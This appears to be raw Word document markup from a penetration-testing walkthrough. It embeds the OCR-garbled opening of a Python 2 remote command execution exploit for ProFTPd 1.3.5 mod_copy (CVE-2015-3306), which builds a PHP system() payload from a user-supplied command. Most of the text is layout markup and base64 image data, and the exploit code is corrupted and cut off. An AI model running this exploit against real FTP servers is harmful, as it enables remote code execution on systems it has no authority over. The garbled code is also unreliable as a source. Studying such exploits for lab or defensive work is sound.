        <w:trPr>
          <w:trHeight w:val="7200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="977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44AEF1A4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t># Title: ProFTPd 1.3.5 Remote Command Execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0678F972" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve"># Date </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>. 20/04/2015</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A064E39" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t># Author: R-73eN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EF3C94F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="70"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t># Software: ProFTPd 1.3.5 with mod_copy</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397EA50E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t># Tested . Kali Linux I.e6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A8EDD42" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve"># CVE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>. 2015-3306</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65CAF847" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="173" w:right="919" w:hanging="15"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t># Greetz to Vadim Melihow for all the hard work import socket import sys import requests socket . socket(socket .AF_INET, socket . SOCK_STREAM) if(len(sys.argv) &lt; 4) :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A3AAB0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="62" w:line="267" w:lineRule="auto"/>
              <w:ind w:left="173" w:right="19" w:firstLine="660"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">print '\n Usage exploit. py server directory cmd' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FD7F52F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1613" w:right="769" w:firstLine="15"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">server = sys.argv[l] *Vulnerable Server directory = sys.argv[2] # Path accessible cmd - sys. argv[3] #PHP payload to be executed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">evil = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>'&lt;?php system("' + cmd + "' )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F8FC0BE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="225" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555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4F7F765B" wp14:editId="67EC5AD2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-91439</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1457325</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3219450" cy="981075"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="334201" name="Group 334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9450" cy="981075"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3219450" cy="981075"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="340751" name="Picture 340751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981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814" name="Rectangle 83814"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2781300" y="219075"/>
                            <a:ext cx="582740" cy="3420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D0C43" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="44"/>
                                </w:rPr>
                                <w:t>line!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7F765B" id="Group 334201" o:spid="_x0000_s1030" style="position:absolute;left:0;text-align:left;margin-left:-7.2pt;margin-top:114.75pt;width:253.5pt;height:77.25pt;z-index:251678720;mso-position-horizontal-relative:text;mso-position-vertical-relative:text" coordsize="32194,981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VFzlhyQIAAMUGAAAOAAAAZHJzL2Uyb0RvYy54bWycVdtuGjEQfa/U&#10;f7D8niwLpJBVIKqaJopUNahpP8B4vbtWvbZlGxb69Z3xXkihl5QHlvHYnjlz5uKb212tyFY4L41e&#10;0PRyRInQ3ORSlwv67ev9xZwSH5jOmTJaLOheeHq7fPvmprGZGJvKqFw4Aka0zxq7oFUINksSzytR&#10;M39prNCwWRhXswBLVya5Yw1Yr1UyHo3eJY1xuXWGC+9Be9du0mW0XxSCh6ei8CIQtaCALcSvi981&#10;fpPlDctKx2wleQeDnYGiZlKD08HUHQuMbJw8MVVL7ow3Rbjkpk5MUUguYgwQTTo6iubBmY2NsZRZ&#10;U9qBJqD2iKezzfLP25UjMl/QyWQKECjRrIY8Rdek0wFJjS0zOPvg7LNduU5RtiuMe1e4Gv8hIrKL&#10;9O4HesUuEA7KyTi9nl5BFjjsXc/T0eyq5Z9XkKSTa7z6+PeLSe82QXQDGCt5Br+OLZBO2Pp3VcGt&#10;sHGCdkbqV9momfu+sReQWMuCXEslwz4WKaQQQentSvKVaxcviJ8CEQPxcAQ9k0mrBabxKp7Gu7BM&#10;cP2LqbWS9l4qhfyj3IGGKj+qkt/E3VbgneGbWujQtpQTCvAb7StpPSUuE/VaQIW4xzxtE+aDE4FX&#10;6LAAx1+gzRAZy4aNiPIADDF7KJzXlsp4NktnUB5HpTJknGXW+fAgTE1QAGwAAWhmGdt+8h2Y/kjH&#10;Wes/AgM4WNIwcnzPFqxO+PqvrnqumBUAAc0ekjufzNNp31TIE9OlEqRVxzaKp4em8n+iaTybp5MR&#10;NA/0DvTR0Dt9c13Nx7Np11vYydMJpupcwlimNLKpDRZWawg10Gk9QpTCbr2Lw2OMzlCzNvkeBkpl&#10;3I8neBYKZZoFNZ1E8aWAZOEuJepRA+U4lHvB9cK6F1xQH0wc3S2a95tgChnze/DWwYJcRinOyhh6&#10;N9dxGL9cx1OH12f5EwAA//8DAFBLAwQKAAAAAAAAACEAFtTJlk4WAABOFgAAFAAAAGRycy9tZWRp&#10;YS9pbWFnZTEuanBn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQE&#10;BQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkF&#10;BQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/&#10;wAARCABnASM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&#10;fgE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VRc5YckCAADFBgAA&#10;DgAAAAAAAAAAAAAAAAA9AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEAFtTJlk4WAABO&#10;FgAAFAAAAAAAAAAAAAAAAAAyBQAAZHJzL21lZGlhL2ltYWdlMS5qcGdQSwECLQAUAAYACAAAACEA&#10;HOBMnOIAAAALAQAADwAAAAAAAAAAAAAAAACyGwAAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgA&#10;AAAhADedwRi6AAAAIQEAABkAAAAAAAAAAAAAAAAAwRwAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJl&#10;bHNQSwUGAAAAAAYABgB8AQAAsh0AAAAA&#10;">
                <v:shape id="Picture 340751" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;width:27717;height:9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q4xgAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasMw&#10;EITvhbyD2EJvjeykcYxrJYRASuktf/ettbVMrJWxFMft01eFQo7DzHzDlOvRtmKg3jeOFaTTBARx&#10;5XTDtYLTcfecg/ABWWPrmBR8k4f1avJQYqHdjfc0HEItIoR9gQpMCF0hpa8MWfRT1xFH78v1FkOU&#10;fS11j7cIt62cJUkmLTYcFwx2tDVUXQ5Xq0BePv3Z/GRbejvm3dCadHn6SJV6ehw3ryACjeEe/m+/&#10;awXzl2S5SOHvT/wCcvULAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAc4MquMYAAADfAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId66" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 83814" o:spid="_x0000_s1032" style="position:absolute;left:27813;top:2190;width:5827;height:3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XcMxwAAAN4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IB7Gg0943AlXQM7uAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAD+xdwzHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="123D0C43" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="44"/>
                          </w:rPr>
                          <w:t>line!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0" wp14:anchorId="71651B5A" wp14:editId="4ED74F92">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3147060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1676400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1314450" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91278" name="Picture 91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8" name="Picture 91278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0" wp14:anchorId="351461E4" wp14:editId="69FC371A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2356485</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2733675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1295400" cy="47625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91285" name="Picture 91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5" name="Picture 91285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0" wp14:anchorId="0BDAC108" wp14:editId="622C088D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2680335</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3038475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="971550" cy="180975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91201" name="Picture 91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1" name="Picture 91201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0" wp14:anchorId="4E50EF59" wp14:editId="11FB1947">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1880235</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3352800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="838200" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91168" name="Picture 91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8" name="Picture 9116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0" wp14:anchorId="69057A81" wp14:editId="12398C2B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>689610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3838575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3009900" cy="19050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340752" name="Picture 340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52" name="Picture 340752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0" wp14:anchorId="44C31747" wp14:editId="0B60C77A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1184910</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4143375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1028700" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91230" name="Picture 91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0" name="Picture 91230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In the example, we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> copied the Python 2 script.</w:t>
      </w:r>
    </w:p>
